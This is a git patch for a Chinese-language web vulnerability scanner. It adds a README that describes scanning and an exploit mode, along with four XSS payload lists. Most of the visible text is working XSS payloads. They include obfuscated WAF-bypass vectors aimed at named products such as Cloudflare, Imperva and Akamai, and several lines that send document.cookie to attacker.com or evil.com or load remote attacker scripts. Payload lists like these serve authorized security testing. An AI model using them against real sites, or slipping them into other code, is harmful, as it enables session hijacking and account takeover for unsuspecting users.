From 6f494279326c9979a2548cde52dac6aaf2d2143b Mon Sep 17 00:00:00 2001
From: achenc1013 <1013199991@qq.com>
Date: Sun, 9 Mar 2025 19:44:06 +0800
Subject: [PATCH] Add files via upload

---
 README.md                                     |  279 +++-
 payloads/xss/xss_level1.txt                   |   15 +
 payloads/xss/xss_level2.txt                   |   29 +
 payloads/xss/xss_level3.txt                   |   50 +
 payloads/xss/xss_waf_bypass.txt               |   69 +
 requirements.txt                              |   24 +
 xss_scanner.py                                |   19 +
 xss_scanner/__init__.py                       |   10 +
 .../__pycache__/__init__.cpython-313.pyc      |  Bin 0 -> 461 bytes
 xss_scanner/__pycache__/main.cpython-313.pyc  |  Bin 0 -> 7383 bytes
 xss_scanner/core/__init__.py                  |    1 +
 .../core/__pycache__/__init__.cpython-313.pyc |  Bin 0 -> 209 bytes
 .../core/__pycache__/config.cpython-313.pyc   |  Bin 0 -> 17160 bytes
 .../core/__pycache__/logger.cpython-313.pyc   |  Bin 0 -> 4096 bytes
 .../scanner_engine.cpython-313.pyc            |  Bin 0 -> 14188 bytes
 xss_scanner/core/config.py                    |  405 +++++
 xss_scanner/core/logger.py                    |  138 ++
 xss_scanner/core/scanner_engine.py            |  339 +++++
 xss_scanner/exploits/csrf_exploit.py          |  111 ++
 xss_scanner/exploits/lfi_exploit.py           |  493 ++++++
 xss_scanner/exploits/rfi_exploit.py           |  267 ++++
 xss_scanner/exploits/sqli_exploit.py          |   60 +
 xss_scanner/exploits/ssrf_exploit.py          |  527 +++++++
 xss_scanner/exploits/xss_exploit.py           |  248 +++
 xss_scanner/exploits/xxe_exploit.py           |  532 +++++++
 xss_scanner/main.py                           |  135 ++
 xss_scanner/payloads/xss/xss_level1.txt       |   15 +
 xss_scanner/payloads/xss/xss_level2.txt       |   29 +
 xss_scanner/payloads/xss/xss_level3.txt       |   50 +
 xss_scanner/payloads/xss/xss_waf_bypass.txt   |   69 +
 xss_scanner/reporters/__init__.py             |    1 +
 .../__pycache__/__init__.cpython-313.pyc      |  Bin 0 -> 223 bytes
 .../report_generator.cpython-313.pyc          |  Bin 0 -> 20731 bytes
 xss_scanner/reporters/report_generator.py     |  581 +++++++
 xss_scanner/scanners/__init__.py              |    1 +
 .../__pycache__/__init__.cpython-313.pyc      |  Bin 0 -> 222 bytes
 .../__pycache__/csrf_scanner.cpython-313.pyc  |  Bin 0 -> 7178 bytes
 .../__pycache__/lfi_scanner.cpython-313.pyc   |  Bin 0 -> 9461 bytes
 .../__pycache__/rfi_scanner.cpython-313.pyc   |  Bin 0 -> 11061 bytes
 .../sql_injection_scanner.cpython-313.pyc     |  Bin 0 -> 17375 bytes
 .../__pycache__/ssrf_scanner.cpython-313.pyc  |  Bin 0 -> 10200 bytes
 .../__pycache__/xss_scanner.cpython-313.pyc   |  Bin 0 -> 54749 bytes
 .../__pycache__/xxe_scanner.cpython-313.pyc   |  Bin 0 -> 28893 bytes
 xss_scanner/scanners/csrf_scanner.py          |  199 +++
 xss_scanner/scanners/lfi_scanner.py           |  331 ++++
 xss_scanner/scanners/rfi_scanner.py           |  351 +++++
 xss_scanner/scanners/sql_injection_scanner.py |  664 ++++++++
 xss_scanner/scanners/ssrf_scanner.py          |  351 +++++
 xss_scanner/scanners/xss_scanner.py           | 1330 +++++++++++++++++
 xss_scanner/scanners/xxe_scanner.py           |  825 ++++++++++
 .../ui/__pycache__/cli.cpython-313.pyc        |  Bin 0 -> 9451 bytes
 xss_scanner/ui/cli.py                         |  248 +++
 .../utils/__pycache__/crawler.cpython-313.pyc |  Bin 0 -> 13126 bytes
 .../__pycache__/http_client.cpython-313.pyc   |  Bin 0 -> 11007 bytes
 .../__pycache__/tech_detector.cpython-313.pyc |  Bin 0 -> 16974 bytes
 .../__pycache__/validator.cpython-313.pyc     |  Bin 0 -> 6909 bytes
 xss_scanner/utils/crawler.py                  |  398 +++++
 xss_scanner/utils/http_client.py              |  315 ++++
 xss_scanner/utils/tech_detector.py            |  384 +++++
 xss_scanner/utils/validator.py                |  228 +++
 60 files changed, 10119 insertions(+), 2 deletions(-)
 create mode 100644 payloads/xss/xss_level1.txt
 create mode 100644 payloads/xss/xss_level2.txt
 create mode 100644 payloads/xss/xss_level3.txt
 create mode 100644 payloads/xss/xss_waf_bypass.txt
 create mode 100644 requirements.txt
 create mode 100644 xss_scanner.py
 create mode 100644 xss_scanner/__init__.py
 create mode 100644 xss_scanner/__pycache__/__init__.cpython-313.pyc
 create mode 100644 xss_scanner/__pycache__/main.cpython-313.pyc
 create mode 100644 xss_scanner/core/__init__.py
 create mode 100644 xss_scanner/core/__pycache__/__init__.cpython-313.pyc
 create mode 100644 xss_scanner/core/__pycache__/config.cpython-313.pyc
 create mode 100644 xss_scanner/core/__pycache__/logger.cpython-313.pyc
 create mode 100644 xss_scanner/core/__pycache__/scanner_engine.cpython-313.pyc
 create mode 100644 xss_scanner/core/config.py
 create mode 100644 xss_scanner/core/logger.py
 create mode 100644 xss_scanner/core/scanner_engine.py
 create mode 100644 xss_scanner/exploits/csrf_exploit.py
 create mode 100644 xss_scanner/exploits/lfi_exploit.py
 create mode 100644 xss_scanner/exploits/rfi_exploit.py
 create mode 100644 xss_scanner/exploits/sqli_exploit.py
 create mode 100644 xss_scanner/exploits/ssrf_exploit.py
 create mode 100644 xss_scanner/exploits/xss_exploit.py
 create mode 100644 xss_scanner/exploits/xxe_exploit.py
 create mode 100644 xss_scanner/main.py
 create mode 100644 xss_scanner/payloads/xss/xss_level1.txt
 create mode 100644 xss_scanner/payloads/xss/xss_level2.txt
 create mode 100644 xss_scanner/payloads/xss/xss_level3.txt
 create mode 100644 xss_scanner/payloads/xss/xss_waf_bypass.txt
 create mode 100644 xss_scanner/reporters/__init__.py
 create mode 100644 xss_scanner/reporters/__pycache__/__init__.cpython-313.pyc
 create mode 100644 xss_scanner/reporters/__pycache__/report_generator.cpython-313.pyc
 create mode 100644 xss_scanner/reporters/report_generator.py
 create mode 100644 xss_scanner/scanners/__init__.py
 create mode 100644 xss_scanner/scanners/__pycache__/__init__.cpython-313.pyc
 create mode 100644 xss_scanner/scanners/__pycache__/csrf_scanner.cpython-313.pyc
 create mode 100644 xss_scanner/scanners/__pycache__/lfi_scanner.cpython-313.pyc
 create mode 100644 xss_scanner/scanners/__pycache__/rfi_scanner.cpython-313.pyc
 create mode 100644 xss_scanner/scanners/__pycache__/sql_injection_scanner.cpython-313.pyc
 create mode 100644 xss_scanner/scanners/__pycache__/ssrf_scanner.cpython-313.pyc
 create mode 100644 xss_scanner/scanners/__pycache__/xss_scanner.cpython-313.pyc
 create mode 100644 xss_scanner/scanners/__pycache__/xxe_scanner.cpython-313.pyc
 create mode 100644 xss_scanner/scanners/csrf_scanner.py
 create mode 100644 xss_scanner/scanners/lfi_scanner.py
 create mode 100644 xss_scanner/scanners/rfi_scanner.py
 create mode 100644 xss_scanner/scanners/sql_injection_scanner.py
 create mode 100644 xss_scanner/scanners/ssrf_scanner.py
 create mode 100644 xss_scanner/scanners/xss_scanner.py
 create mode 100644 xss_scanner/scanners/xxe_scanner.py
 create mode 100644 xss_scanner/ui/__pycache__/cli.cpython-313.pyc
 create mode 100644 xss_scanner/ui/cli.py
 create mode 100644 xss_scanner/utils/__pycache__/crawler.cpython-313.pyc
 create mode 100644 xss_scanner/utils/__pycache__/http_client.cpython-313.pyc
 create mode 100644 xss_scanner/utils/__pycache__/tech_detector.cpython-313.pyc
 create mode 100644 xss_scanner/utils/__pycache__/validator.cpython-313.pyc
 create mode 100644 xss_scanner/utils/crawler.py
 create mode 100644 xss_scanner/utils/http_client.py
 create mode 100644 xss_scanner/utils/tech_detector.py
 create mode 100644 xss_scanner/utils/validator.py

diff --git a/README.md b/README.md
index 1bc8ec2..d3b9f0a 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,277 @@
-# xss_scanner_mix
-这是一个全面的Web应用安全扫描工具，专注于检测XSS（跨站脚本）漏洞，同时也能够发现其他类型的Web安全漏洞。该工具支持多种扫描模式、不同级别的有效载荷和详细的漏洞报告。
+# 深度XSS漏洞扫描器
+
+这是一个全面的Web应用安全扫描工具，专注于检测XSS（跨站脚本）漏洞，同时也能够发现其他类型的Web安全漏洞。该工具支持多种扫描模式、不同级别的有效载荷和详细的漏洞报告。
+
+## 功能特点
+
+- **多种漏洞检测**：
+  - XSS（反射型、存储型、DOM型）
+  - CSRF（跨站请求伪造）
+  - SQL注入
+  - LFI（本地文件包含）
+  - RFI（远程文件包含）
+  - SSRF（服务器端请求伪造）
+  - XXE（XML外部实体注入）
+
+- **全面的扫描能力**：
+  - 网站爬虫功能，自动发现可测试的URL
+  - 表单和参数自动检测
+  - 支持DOM分析
+  - 支持不同测试级别（快速、标准、深度）
+  - 支持多线程扫描
+
+- **网页技术识别**：
+  - 自动识别目标网站使用的编程语言（PHP、ASP.NET、Java、Python等）
+  - 检测前端框架（React、Vue、Angular、jQuery等）
+  - 识别Web服务器类型（Apache、Nginx、IIS等）
+  - 识别CMS系统（WordPress、Joomla、Drupal等）
+  - 框架版本指纹识别
+
+- **高级WAF绕过功能**：
+  - 自动检测目标是否启用Web应用防火墙(WAF)
+  - 识别WAF类型（如Cloudflare、ModSecurity、AWS WAF等）
+  - 自动调整有效载荷以绕过WAF检测
+  - 多种绕过技术（编码变异、分段注入、定时执行等）
+  - 自适应绕过策略，根据WAF反应调整攻击向量
+
+- **增强的XSS检测**：
+  - 支持三个级别(Level 1-3)的XSS有效载荷复杂度
+  - 智能检测技术栈，自动选择最佳攻击向量
+  - 多引擎检测策略（反射型、DOM型、存储型XSS）
+  - 基于真实浏览器的XSS验证
+  - 支持SVG、XML、JSON等特殊环境下的XSS检测
+  - 包含最新的WAF绕过技术
+
+- **高级功能**：
+  - 有效载荷自动绕过WAF
+  - 支持自定义有效载荷
+  - 基于浏览器的漏洞验证
+  - 支持漏洞利用
+  - 支持代理和认证
+
+- **详细报告**：
+  - 多种报告格式（HTML、JSON、XML、TXT）
+  - 详细的漏洞信息和修复建议
+  - 风险评级
+  - 网站技术栈分析报告
+
+## 安装
+
+### 要求
+- Python 3.7+
+- Chrome浏览器（如需浏览器测试）
+
+### 安装步骤
+
+1. 克隆仓库：
+```bash
+git clone https://github.com/achenc1013/XSS_Scanner.git
+cd XSS_Scanner
+```
+
+2. 安装依赖：
+```bash
+pip install -r requirements.txt
+```
+
+3. 安装ChromeDriver（如需浏览器测试）：
+```bash
+# Windows使用以下命令：
+pip install webdriver-manager
+
+# Linux可能需要安装Chrome：
+# sudo apt-get install google-chrome-stable
+```
+
+## 使用方法
+
+### 基本用法
+
+```bash
+python xss_scanner.py -u https://example.com
+```
+
+### 更多示例
+
+**扫描单个URL**：
+```bash
+python xss_scanner.py -u https://example.com
+```
+
+**扫描多个URL**：
+```bash
+python xss_scanner.py -f targets.txt
+```
+
+**深度扫描**：
+```bash
+python xss_scanner.py -u https://example.com --scan-level 3
+```
+
+**只扫描XSS漏洞**：
+```bash
+python xss_scanner.py -u https://example.com --scan-type xss
+```
+
+**使用浏览器进行DOM XSS检测**：
+```bash
+python xss_scanner.py -u https://example.com --browser
+```
+
+**利用发现的漏洞**：
+```bash
+python xss_scanner.py -u https://example.com --exploit
+```
+
+**生成HTML报告**：
+```bash
+python xss_scanner.py -u https://example.com -o report.html --format html
+```
+
+**使用代理**：
+```bash
+python xss_scanner.py -u https://example.com --proxy http://127.0.0.1:8080
+```
+
+### 命令行参数
+
+```
+必选参数:
+  -u, --url URL              目标URL
+  -f, --file FILE            包含目标URL的文件
+
+可选参数:
+  -d, --depth DEPTH          爬虫深度 (默认: 2)
+  -t, --threads THREADS      线程数 (默认: 5)
+  --timeout TIMEOUT          请求超时时间 (默认: 10秒)
+  --user-agent USER_AGENT    自定义User-Agent
+  --cookie COOKIE            请求Cookie
+  --headers HEADERS          自定义HTTP头
+  --proxy PROXY              HTTP代理
+  --scan-level {1,2,3}       扫描级别: 1-快速, 2-标准, 3-深度 (默认: 2)
+  --scan-type {all,xss,csrf,sqli,lfi,rfi,ssrf,xxe}
+                             扫描类型 (默认: all)
+  --payload-level {1,2,3}    Payload复杂度: 1-基础, 2-标准, 3-高级 (默认: 2)
+  -o, --output OUTPUT        输出报告文件
+  --format {txt,html,json,xml}
+                             报告格式 (默认: html)
+  -v, --verbose              显示详细输出
+  --no-color                 禁用彩色输出
+
+高级选项:
+  --browser                  使用真实浏览器进行扫描
+  --exploit                  尝试利用发现的漏洞
+  --custom-payloads FILE     自定义Payload文件
+  --exclude REGEX            排除URL模式 (正则表达式)
+  --include REGEX            仅包含URL模式 (正则表达式)
+  --auth USER:PASS           基本认证
+```
+
+## XSS漏洞案例
+
+扫描器能够检测以下XSS攻击场景：
+
+1. **网页留言板获取cookie**：检测表单提交中的XSS漏洞，可能导致cookie泄露
+2. **CMS管理后台伪造钓鱼网站**：检测URL参数中的XSS漏洞，可能用于伪造管理界面
+3. **图片处XSS攻击**：检测图片参数和属性中的XSS漏洞
+4. **SVG-XSS**：检测SVG文件中的XML注入和XSS漏洞
+5. **PDF-XSS**：检测PDF参数中的XSS漏洞
+6. **浏览器翻译-XSS**：检测浏览器翻译功能中的XSS漏洞
+7. **Flash-XSS**：检测Flash参数中的XSS漏洞
+8. **XSS配合MSf钓鱼**：检测可能用于钓鱼的XSS漏洞
+9. **XSS漏洞配合CSRF漏洞**：检测可能与CSRF组合的XSS漏洞
+10. **XSS漏洞配合越权漏洞**：检测可能导致权限提升的XSS漏洞
+11. **前端框架XSS**：检测React、Vue、Angular等前端框架中的XSS漏洞
+12. **模板注入XSS**：检测模板引擎中的XSS漏洞，包括Jinja2、Twig、Handlebars等
+13. **JSON-XSS**：检测JSON数据中的XSS漏洞，包括JSON.parse和eval使用不当
+14. **WebSocket-XSS**：检测WebSocket通信中的XSS漏洞
+15. **PostMessage-XSS**：检测跨域消息传递中的XSS漏洞
+
+## XSS有效载荷级别
+
+扫描器提供了三个级别的XSS有效载荷：
+
+### Level 1 - 基础有效载荷
+最基本的XSS向量，用于检测无防护的网站。包含15个常见的XSS攻击代码。
+
+### Level 2 - 标准有效载荷
+中等复杂度的XSS向量，包含绕过基本过滤的技术。包含约29个XSS攻击代码，结合了多种标签和事件处理程序。
+
+### Level 3 - 高级有效载荷
+最复杂的XSS向量，包含高级编码、混淆和WAF绕过技术。包含约50个复杂的XSS攻击代码，可以绕过大多数WAF和安全过滤器。
+
+## XSS检测技术
+
+扫描器使用多种技术来检测XSS漏洞：
+
+1. **反射型XSS检测**：检测服务器响应中直接反射的用户输入
+2. **DOM型XSS检测**：使用真实浏览器分析DOM操作和事件处理
+3. **存储型XSS检测**：测试在一个页面提交的数据是否在另一个页面中触发XSS
+4. **上下文感知检测**：根据XSS注入点的上下文选择合适的有效载荷
+5. **WAF绕过技术**：使用多种编码和混淆技术绕过WAF防护
+
+## 进阶用法
+
+### 自定义有效载荷
+
+创建一个文本文件，每行包含一个XSS有效载荷，然后使用`--custom-payloads`参数：
+
+```bash
+python xss_scanner.py -u https://example.com --custom-payloads my_payloads.txt
+```
+
+### 漏洞利用
+
+使用`--exploit`参数启用漏洞利用功能：
+
+```bash
+python xss_scanner.py -u https://example.com --exploit
+```
+
+当发现漏洞时，扫描器将尝试进一步利用该漏洞，例如：
+- XSS漏洞：尝试窃取cookie或会话信息
+- SQL注入：尝试提取数据库信息
+- 文件包含：尝试读取敏感文件
+
+### 限制扫描范围
+
+使用正则表达式包含或排除特定URL：
+
+```bash
+# 只扫描/admin/路径下的URL
+python xss_scanner.py -u https://example.com --include "^https://example.com/admin/.*"
+
+# 排除静态资源
+python xss_scanner.py -u https://example.com --exclude "\.(jpg|css|js|png|gif)$"
+```
+
+## 安全和免责声明
+
+此工具仅供安全研究和授权渗透测试使用。未经明确许可，对系统进行扫描可能违反法律。使用者需要：
+
+1. 只在自己拥有的系统上或获得明确授权的系统上使用
+2. 了解并遵守当地的网络安全法律和规定
+3. 负责任地披露发现的安全漏洞
+
+## 贡献
+
+欢迎贡献代码、报告bug或提出功能建议。请通过以下方式参与：
+
+1. Fork仓库
+2. 创建功能分支 (`git checkout -b feature/amazing-feature`)
+3. 提交更改 (`git commit -m 'Add some amazing feature'`)
+4. 推送到分支 (`git push origin feature/amazing-feature`)
+5. 创建Pull Request
+
+## 许可证
+
+本项目采用MIT许可证 - 详情请查看[LICENSE](LICENSE)文件。
+
+## 联系方式
+
+- 项目链接: [https://github.com/achenc1013/XSS_Scanner](https://github.com/achenc1013/XSS_Scanner)
+- 联系邮箱: [1013199991@qq.com](mailto:1013199991@qq.com)
+
+---
+
+**注意**：此工具是为安全专业人员设计的，使用前请确保遵守所有适用的法律和法规。
diff --git a/payloads/xss/xss_level1.txt b/payloads/xss/xss_level1.txt
new file mode 100644
index 0000000..ae0feee
--- /dev/null
+++ b/payloads/xss/xss_level1.txt
@@ -0,0 +1,15 @@
+<script>alert('XSS')</script>
+<img src=x onerror=alert('XSS')>
+<svg onload=alert('XSS')>
+<body onload=alert('XSS')>
+<iframe onload=alert('XSS')></iframe>
+javascript:alert('XSS')
+<input autofocus onfocus=alert('XSS')>
+<select autofocus onfocus=alert('XSS')>
+<textarea autofocus onfocus=alert('XSS')>
+<keygen autofocus onfocus=alert('XSS')>
+<video><source onerror=alert('XSS')>
+<audio src=x onerror=alert('XSS')>
+"><script>alert('XSS')</script>
+'><script>alert('XSS')</script>
+><img src=x onerror=alert('XSS')> 
\ No newline at end of file
diff --git a/payloads/xss/xss_level2.txt b/payloads/xss/xss_level2.txt
new file mode 100644
index 0000000..fbd5db4
--- /dev/null
+++ b/payloads/xss/xss_level2.txt
@@ -0,0 +1,29 @@
+# 基本混淆和绕过技术
+<script>eval(atob('YWxlcnQoJ1hTUycpOw=='))</script>
+<IMG SRC="javascript:alert('XSS');">
+<svg><script>alert&#40;1&#41</script>
+<body onpageshow=alert(1)>
+<body onload=alert('XSS')>
+<input type="text" value="" onfocus="alert('XSS')" autofocus>
+<video><source onerror="javascript:alert('XSS')">
+<iFrAme SRC="javascript:alert('XSS');"></iFramE>
+<div onmouseover="alert('XSS')">XSS</div>
+<marquee onstart='alert("XSS")'>XSS</marquee>
+<img src="/" onerror="alert(String.fromCharCode(88,83,83))"/>
+<svg onload="javascript:alert('XSS')" xmlns="http://www.w3.org/2000/svg"></svg>
+<style>@import 'data:text/css;base64,KiAge2JhY2tncm91bmQtaW1hZ2U6IHVybCgiamF2YXNjcmlwdDphbGVydCgiWFNTIikiKX0=')</style>
+<math><a xlink:href="javascript:alert(1)">click</a></math>
+<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
+<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed>
+<base href="javascript:alert('XSS')//">
+<script src="data:text/javascript,alert(1)"></script>
+<iframe src="javascript:alert('XSS');"></iframe>
+<form action="javascript:alert('XSS')"><input type="submit"></form>
+<isindex action="javascript:alert('XSS')" type=image>
+<input type="image" src="javascript:alert('XSS');">
+<table background="javascript:alert('XSS')">
+<button form="test" formaction="javascript:alert(1)">XSS</button>
+<meta http-equiv="refresh" content="0;url=javascript:alert('XSS');">
+<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>XSS</a>
+<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$_$+$.__$+$.$$_+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.__$+$.__$+$._+"(\\\"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\\")"+$.$$$_)())();</script>
+<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">XSS</a> 
\ No newline at end of file
diff --git a/payloads/xss/xss_level3.txt b/payloads/xss/xss_level3.txt
new file mode 100644
index 0000000..26aa120
--- /dev/null
+++ b/payloads/xss/xss_level3.txt
@@ -0,0 +1,50 @@
+# 高级XSS有效载荷与绕过技术
+<script>Function("ale"+"rt(1)")();</script>
+<script>['ale'+'rt'](1)</script>
+<script>window['alert'](0)</script>
+<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
+<svg onload=prompt(1);>
+<script>new Function`alt\`1\``</script>
+<script>(()=>{return this})().alert(1)</script>
+<script>var{a:onerror}={a:eval};throw 'alert\x281\x29'</script>
+<img/id="'`-->" src=x onerror=javascript:alert(2)>
+<img src=x onerror=eval('\141\154\145\162\164\50\61\51')>
+<body/onhashchange=alert(1)><a href=#>click
+<iframe src=javascript:alert(1)//
+<script ~~~>confirm(1)</script ~~~>
+<script>$=Function,$($()\`alert\\\`1\\\`\`)();</script>
+<script>onerror=eval;throw'=alert\x281\x29';</script>
+<script>delete[a],alert(1)</script>
+<svg><discard onbegin=alert(1)>
+<math href="javascript:alert(1)">CLICKME</math>
+<img src=x:alert(alt) onerror=eval(src) alt=xss>
+<a href="j&Tab;a&Tab;v&Tab;asc&Tab;r&Tab;ipt&colon;confirm&lpar;1&rpar;">Click</a>
+<dETAILS open onToGgle=a=alert,a(1)>
+<iframe src="javascript:void(top[Object.keys(top)[2]](Object.keys(top)[5]))" width="500" height="500"></iframe>
+<embed code="//x.test/xss.swf" allowscriptaccess=always></embed>
+<svg><set onbegin=d=document;d.evaluate('\u0061lert(1)',d,null,6,null).iterateNext() >
+<iframe/onload=action=URL;Array(1).keys(a=function(...args)args[0].dispatchEvent(new+Event('focus'))).next(a(body.querySelector('input[autofocus]'))>
+<math><mtext><option><FAKEELEMENT><math><option><annotation-xml encoding="text/html"><iframe onload=alert(1)></iframe></annotation-xml></math></option></option></mtext></math>
+<style>:target {color:red;}</style><xss id=x style="transition:color 10s" ontransitioncancel=alert(1)></xss>
+<svg><animate onrepeat=alert(1) attributeName=x dur=1m></animate>
+<details/open=/id=x tabindex=1 onfocus=alert(1) id=x>
+<img src onerror=\u0065\u0076\u0061\u006c\u0028\u0061\u0074\u006f\u0062\u0028\u0027\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u0059\u0053\u0063\u0072\u0056\u006c\u004e\u0054\u004a\u0027\u0029\u0029>
+<iframe/src="data:text/html,<svg onload=confirm(1)>"><script>~'</script><!--<script>eval('var a=String.fromCharCode(47);var b=String.fromCharCode(42);var c=String.fromCharCode(42);var d=String.fromCharCode(47);eval(\'docu\'+\'ment.bod\'+\'y.inne\'+\'rHTML="Hac\'+\'ked"\');')</script>
+<object data="data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e"></object>
+<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
+<textarea id=ta onfocus=console.log(event)></textarea><div contenteditable onbeforeinput="ta.dispatchEvent(new InputEvent('input', {inputType: 'insertFromPaste', data: 'alert(1)', dataTransfer: new DataTransfer()}))"
+<div style="filter:url('data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>');">
+<iframe srcdoc="<script>top[8680439..toString(30)](1)</script>">
+<P%=tE%xt><svg/o%=nload=confirm(9)><ClIcK me</SvG>
+<svg><animate onbegin%3D=alert%26%23x28;)></animate>
+<input type="search" onsearch="alert()()()()" />
+<meta charset="x-mac-farsi">\u03C3cript\u03BE alert('xss');</script>
+<scr\0ipt>confirm(1)</scr\0ipt>
+<a onmouseover="document['cookie']=['Cookie Monster!']; alert(document['cookie'])">XSS</a>
+<img/src='data:image/svg+xml,<svg onload=alert(1)>' />
+<input onfocus="alert(document.domain);" autofocus>
+<script>throw{set:document.location='//attacker.com',name:'cookie',message:document.cookie}</script>
+<input autofocus="autofocus"onkeyup="this.focus();var a=this.style.box-shadow; a = document.domain; alert(a);" value="I contain info">
+<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11; id="fuzzelement1">test</a>
+<div style="background:url(http://foo.f/f ='`'><script>alert(1)</script>"><script>alert(1)</script>
+<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"></import> <t:set attributeName="innerHTML" targetElement="x" to="<img src=x onerror=alert(1)>"></t:set> 
\ No newline at end of file
diff --git a/payloads/xss/xss_waf_bypass.txt b/payloads/xss/xss_waf_bypass.txt
new file mode 100644
index 0000000..c2c1043
--- /dev/null
+++ b/payloads/xss/xss_waf_bypass.txt
@@ -0,0 +1,69 @@
+# Cloudflare绕过
+<ScrIpT>prompt(1)</sCrIpT>
+<a/onmouseover=prompt(1)>XSS
+<a/href="j&#97v&#97script&#x3A;&#97lert(1)">XSS
+<svg/onload=confirm(String.fromCharCode(88,83,83))>
+<img/src="x"/onerror=document['cookie'];eval(atob('YWxlcnQoImNvb2tpZSBzdGVhbGVyIik7'));>
+<body/onwheel="[1].find(alert)">Roll ME
+<svg onload=setInterval`alert\u0028document.domain\u0029`>
+<x/onclick=document.location='http://xss.rocks/xss.js'>click me
+
+# ModSecurity绕过
+<details/open/ontoggle="alert`1`">XSS
+<a69/onclick=[1].map(alert)>XSS
+<IfRaMe/src=javascript:alert(1)>
+<l/onclick="[''].findIndex(alert)">l
+<%78%63%72%69%70%74>a=prompt;a(1);</%78%63%72%69%70%74>
+<img src=1 onerror="a=alert;a(1)">
+<img src=1 o&#x6e;error="javascript&colon;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;1&#x29;">
+
+# Imperva绕过
+<iframe/onload='this["src"]="javas&Tab;cript:document["locati&Tab;on"]["replace"]("https://evil.com/"+document["cookie"]);'>
+<img src=x:prompt(eval(atob('ZG9jdW1lbnQuY29va2ll')))>
+<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
+<scrIPT x=">" SRC="https://attacker.com/xss.js"></scrIPT>
+<d3"<"/onclick="1>[confirm``]"<">d3
+
+# F5 BIG-IP绕过
+<noscript><p title="</noscript><img src=x onerror=alert(1)>">
+<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>XSS
+<input type="text" value="> " onkeydown="prompt(1)" autofocus ">
+<form><button formaction=javascript&colon;alert(1)>XSS
+<img/src='x'%0Aonerror=confirm`1`>
+
+# Akamai绕过
+<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">XSS</a>
+<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
+<img src=``&NewLine; onerror=alert(1)&NewLine;``>
+<script>~'<script>'/**/;alert(1)//'</script>
+<style><script>a@import'//XSS.rocks'</script></style>
+
+# 通用WAF绕过
+<svg><animate onbegin=confirm() attributeName=x></svg>
+<script>$=1,$$='ale',$$$='rt',$$$$=`(1)`,eval($$+$$$+$$$$)</script>
+<details ontoggle=eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))>
+<img src=x onerror=\u0065\u0076\u0061\u006c('\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029')>
+<body onpageshow=top['ale'+'rt']('1')>
+<body onpageshow=function(){eval(String.fromCodePoint(97,108,101,114,116,40,49,41))}>
+<math><xss href="javascript:alert(1)">XSS
+<a href="j&X41vascript&colon;alert&lpar;1&rpar;">XSS
+<button autofocus onfocus=top[11000000..toString(36)[0]+628..toString(36)[1]+'ert'](1)></button>
+<img/src="x"/onerror=top['\141\154\145\162\164'](1)>
+<svg><script>+(x=>document[`body`].appendChild(document[`createElement`](`img`)).src=`https://attacker.com/c/`+document[`cookie`])()</script>
+<a href=&#01javascript:alert(1)>XSS
+<img src="x" onerror="window&#46;document&#46;location = '//attacker.com/' + document&#46;cookie;">
+<iframe srcdoc="<a href='javascript:alert(1)'>XSS</a>"></iframe>
+
+# 混淆和编码组合
+<img src=x onerror="Function(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()">
+<body><template><s id=x onclick=alert()>XSS</s></template></body>
+<img src=x onerror=eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029')>
+<A HREF="h&#x74t&#x70&#x3a&#x2f&#x2f&#x67o&#x6f&#x67&#x6c&#x65&#x2e&#x63&#x6f&#x6d">XSS</A>
+<body><textarea onkeyup='javascript:"\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e"'></textarea>
+<img%09onerror=alert(1) src=a>
+<i onclick=c&#39;onfirm(1)>click me</i>
+<div id="x">x</div><script>Object.prototype.BUMMER=1;document.getElementById('x').innerHTML='XSS'</script>
+<iframe src="javascript:(function(){var s=document.createElement('script');s.src='//attacker.com/hook.js';document.body.appendChild(s)})()"></iframe>
+<input autofocus onfocus="document.body.appendChild(document.createElement`img`).src='https://attacker.com/c/'+document.cookie">
+<math><mtext><option><FAKEELEMENT><math><option><annotation-xml encoding="text/html"><img src=x onerror=alert(1)><annotation-xml>
